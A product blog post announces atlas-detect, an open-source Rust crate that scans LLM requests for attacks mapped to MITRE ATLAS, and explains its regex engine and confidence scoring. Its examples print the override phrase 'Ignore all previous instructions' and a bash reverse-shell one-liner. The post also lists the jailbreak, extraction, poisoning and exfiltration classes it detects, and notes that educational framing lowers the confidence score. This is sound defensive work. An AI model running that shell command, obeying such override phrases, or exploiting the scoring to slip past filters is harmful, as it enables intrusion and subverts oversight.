We open-sourced our AI attack detection engine — 97 MITRE ATLAS rules in a Rust crate

#rust #security #llm #opensource

Today we're publishing atlas-detect — the detection engine that powers AgentSentry's AI attack prevention — as a standalone open-source Rust crate.

→ https://crates.io/crates/atlas-detect

The problem we were solving

When we started building AgentSentry, we needed to answer one question on every LLM API call: is this request an attack?

Not a heuristic guess. Not a vibe check. An actual mapping to the MITRE ATLAS framework — the authoritative catalogue of adversarial techniques targeting AI systems.

MITRE ATLAS has 16 tactics and 111 techniques. We needed to cover as many as possible, in real time, with zero tolerance for false positives on legitimate developer queries.

Here's what that looks like in practice:

"Ignore all previous instructions"          → AML.T0036 (Prompt Injection) — BLOCK
"How do I override a method in Python?"     → nothing — ALLOW  
"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"  → AML.T0057.002 (Reverse Shell) — BLOCK
"Explain how prompt injection works"        → nothing — ALLOW (educational context)

The second and fourth lines are where most detectors fail. We spent significant time on this.

How it works

The engine compiles all 97 detection patterns into a single RegexSet using Rust's regex crate. This means every request is scanned against all rules in one pass — not 97 sequential checks.

use atlas_detect::Detector;

let detector = Detector::new();
let hits = detector.scan("Ignore all previous instructions");

if detector.should_block(&hits) {
    // Returns: ["AML.T0036"]
}

The initial compilation is cached globally via once_cell. After the first call, Detector::new() is free. Scan latency on typical LLM prompts is under 1ms.

The false positive problem

Early versions had a 30% false positive rate. Security education queries like "explain how prompt injection works for my course" were getting blocked alongside actual attacks.

The fix was confidence scoring. When a pattern matches, we compute a confidence score based on:

Base score from severity (Critical = 80, High = 65, Medium = 50...)
+20 if multiple techniques fire together (coordinated attack signal)
+20 if this agent has a high historical block rate
+10 if the message is unusually short (injections tend to be terse)
-25 if educational/research framing is detected

After scoring, we filter by threshold. A medium-severity hit needs 60% confidence to become a block. Critical hits only need 50%.

Result: 0% false positives on a 20-query clean test battery, 100% true positive rate maintained.

What it detects

97 content-detectable techniques across all 16 MITRE ATLAS tactics:

Prompt injection variants (AML.T0036 and sub-techniques)
Jailbreaks — DAN, STAN, roleplay framing, authority impersonation
Credential exfiltration — env var dumps, RAG credential harvesting
Model extraction — weight theft, system prompt extraction
RAG poisoning — embedded instructions in document-like content
Reverse shells and C2 — bash one-liners, PowerShell encoded commands
Multilingual injections — 20+ languages including Cyrillic homoglyphs
Base64/obfuscation evasion — decoded and re-scanned
Deepfake generation requests
Data destruction commands
Denial of service patterns

14 additional ATLAS techniques require behavioral detection (rate limiting, auth pattern analysis) — content regex can't catch them, and atlas-detect is honest about this in the docs.

Why open source this

The detection rules are not our competitive advantage. Anyone determined enough could reconstruct them from the MITRE ATLAS documentation.

Our advantage is the integrated system: the enforcement gateway, agent discovery, incident correlation, topology mapping, per-agent policy engine, and the platform that ties it all together. That stays closed.

But the detection engine is genuinely useful to the Rust community — anyone building an LLM proxy, an AI security tool, or just adding safety checks to an AI application. Publishing it creates goodwill, drives inbound interest in AgentSentry, and positions Akav Labs as contributors to the AI security ecosystem rather than just consumers of it.

Using it in your project

[dependencies]
atlas-detect = "0.1"

With serde for JSON serialization:

atlas-detect = { version = "0.1", features = ["serde"] }

With context for better accuracy:

use atlas_detect::{Detector, ScanContext};

let detector = Detector::new();
let ctx = ScanContext {
    content: user_message.to_string(),
    agent_block_history: get_agent_block_ratio(&agent_id),
    ..Default::default()
};
let hits = detector.scan_with_context(&ctx);